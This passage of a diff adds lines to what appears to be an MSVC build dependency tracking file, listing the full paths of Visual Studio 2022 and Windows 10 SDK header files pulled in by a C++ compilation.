     33 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_STRING.H
     34 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WSTRING.H
     35 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK4.H
     36 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\POPPACK.H
     37 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK2.H
     38 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK8.H
     39 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\PSHPACK1.H
     40 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\APISET.H
     41 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\KTMTYPES.H
     42 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINBASE.H
     43 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\APISETCCONV.H
     44 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MINWINBASE.H
     45 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\APIQUERY2.H
     46 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROCESSENV.H
     47 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\FILEAPIFROMAPP.H
     48 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\FILEAPI.H
     49 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DEBUGAPI.H
     50 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\UTILAPISET.H
     51 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\HANDLEAPI.H
     52 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\ERRHANDLINGAPI.H
     53 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\FIBERSAPI.H
     54 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NAMEDPIPEAPI.H
     55 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROFILEAPI.H
     56 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\HEAPAPI.H
     57 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\IOAPISET.H
     58 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SYNCHAPI.H
     59 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\INTERLOCKEDAPI.H
     60 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROCESSTHREADSAPI.H
     61 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SYSINFOAPI.H
     62 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MEMORYAPI.H
     63 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\ENCLAVEAPI.H
     64 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\THREADPOOLLEGACYAPISET.H
     65 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\THREADPOOLAPISET.H
     66 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\JOBAPI.H
     67 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\JOBAPI2.H
     68 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WOW64APISET.H
     69 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\LIBLOADERAPI.H
     70 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SECURITYBASEAPI.H
     71 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NAMESPACEAPI.H
     72 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SYSTEMTOPOLOGYAPI.H
     73 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROCESSTOPOLOGYAPI.H
     74 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SECURITYAPPCONTAINER.H
     75 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\REALTIMEAPISET.H
     76 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINERROR.H
     77 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\TIMEZONEAPI.H
     78 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINGDI.H
     79 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINUSER.H
     80 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\TVOUT.H
     81 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINNLS.H
     82 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DATETIMEAPI.H
     83 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\STRINGAPISET.H
     84 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINCON.H
     85 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINCONTYPES.H
     86 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CONSOLEAPI.H
     87 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CONSOLEAPI2.H
     88 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CONSOLEAPI3.H
     89 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINVER.H
     90 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\VERRSRC.H
     91 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINREG.H
     92 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\REASON.H
     93 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINNETWK.H
     94 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WNNC.H
     95 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\CDERR.H
     96 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DDE.H
     97 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DDEML.H
     98 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DLGS.H
     99 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\LZEXPAND.H
     100 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMSYSTEM.H
     101 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMSYSCOM.H
     102 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MCIAPI.H
     103 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMISCAPI.H
     104 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMISCAPI2.H
     105 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PLAYSOUNDAPI.H
     106 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MMEAPI.H
     107 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\TIMEAPI.H
     108 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\JOYSTICKAPI.H
     109 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NB30.H
     110 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPC.H
     111 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCDCE.H
     112 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCDCEP.H
     113 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\RPCNSI.H
     114 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCNTERR.H
     115 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCASYNC.H
     116 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SHELLAPI.H
     117 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINPERF.H
     118 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSOCK.H
     119 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\INADDR.H
     120 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINCRYPT.H
     121 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\BCRYPT.H
     122 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\NCRYPT.H
     123 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\DPAPI.H
     124 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINEFS.H
     125 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSCARD.H
     126 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WTYPES.H
     127 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCNDR.H
     128 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\RPCNSIP.H
     129 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\RPCSAL.H
     130 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WTYPESBASE.H
     131 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINIOCTL.H
     132 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINSMCRD.H
     133 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSPOOL.H
     134 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PRSHT.H
     135 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OLE2.H
     136 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OBJBASE.H
     137 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\COMBASEAPI.H
     138 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STDLIB.H
     139 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MALLOC.H
     140 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_SEARCH.H
     141 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STDDEF.H
     142 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WSTDLIB.H
     143 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\LIMITS.H
     144 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\UNKNWNBASE.H
     145 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OBJIDLBASE.H
     146 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\CGUID.H
     147 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\COML2API.H
     148 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OBJIDL.H
     149 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\UNKNWN.H
     150 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROPIDLBASE.H
     151 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OAIDL.H
     152 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\URLMON.H
     153 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OLEIDL.H
     154 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SERVPROV.H
     155 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MSXML.H
     156 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROPIDL.H
     157 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OLEAUTO.H
     158 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\COMMDLG.H
     159 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\STRALIGN.H
     160 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSVC.H
     161 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MCX.H
     162 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\IMM.H
     163 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\IME_CMODES.H
     164 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\IOSTREAM
     165 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\YVALS_CORE.H
     166 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XKEYCHECK.H
     167 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ISTREAM
     168 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\OSTREAM
     169 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\IOS
     170 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XLOCNUM
     171 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CLIMITS
     172 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CMATH
     173 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\YVALS.H
     174 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CRTDBG.H
     175 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_NEW_DEBUG.H
     176 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_NEW.H
     177 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CRTDEFS.H
     178 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\USE_ANSI.H
     179 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDLIB
     180 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\MATH.H
     181 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MATH.H
     182 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XTR1COMMON
     183 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\INTRIN0.H
     184 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\INTRIN0.INL.H
     185 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XUTILITY
     186 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTRING
     187 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\UTILITY
     188 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\TYPE_TRAITS
     189 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDINT
     190 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STDINT.H
     191 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XSTDDEF
     192 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDDEF
     193 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\INITIALIZER_LIST
     194 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CONCEPTS
     195 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\COMPARE
     196 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\BIT
     197 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ISA_AVAILABILITY.H
     198 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\LIMITS
     199 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CFLOAT
     200 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\FLOAT.H
     201 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CWCHAR
     202 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDIO
     203 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STDIO.H
     204 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WSTDIO.H
     205 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_STDIO_CONFIG.H
     206 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\WCHAR.H
     207 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WCONIO.H
     208 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WDIRECT.H
     209 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WIO.H
     210 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_SHARE.H
     211 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WPROCESS.H
     212 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WTIME.H
     213 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\SYS\STAT.H
     214 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\SYS\TYPES.H
     215 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ITERATOR
     216 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\IOSFWD
     217 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STREAMBUF
     218 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XIOSBASE
     219 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\SHARE.H
     220 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\SYSTEM_ERROR
     221 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\__MSVC_SYSTEM_ERROR_ABI.HPP
     222 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CERRNO
     223 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STDEXCEPT
     224 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\EXCEPTION
     225 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\MALLOC.H
     226 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_EXCEPTION.H
     227 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\EH.H
     228 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_TERMINATE.H
     229 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XSTRING
     230 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XMEMORY
     231 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\NEW
     232 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XATOMIC.H
     233 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\TUPLE
     234 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XPOLYMORPHIC_ALLOCATOR.H
     235 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XCALL_ONCE.H
     236 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XERRC.H
     237 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ATOMIC
     238 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XATOMIC_WAIT.H
     239 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XTHREADS.H
     240 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XTIMEC.H
     241 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CTIME
     242 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\TIME.H
     243 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XLOCALE
     244 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\MEMORY
     245 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\TYPEINFO
     246 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_TYPEINFO.H
     247 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XFACET
     248 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XLOCINFO
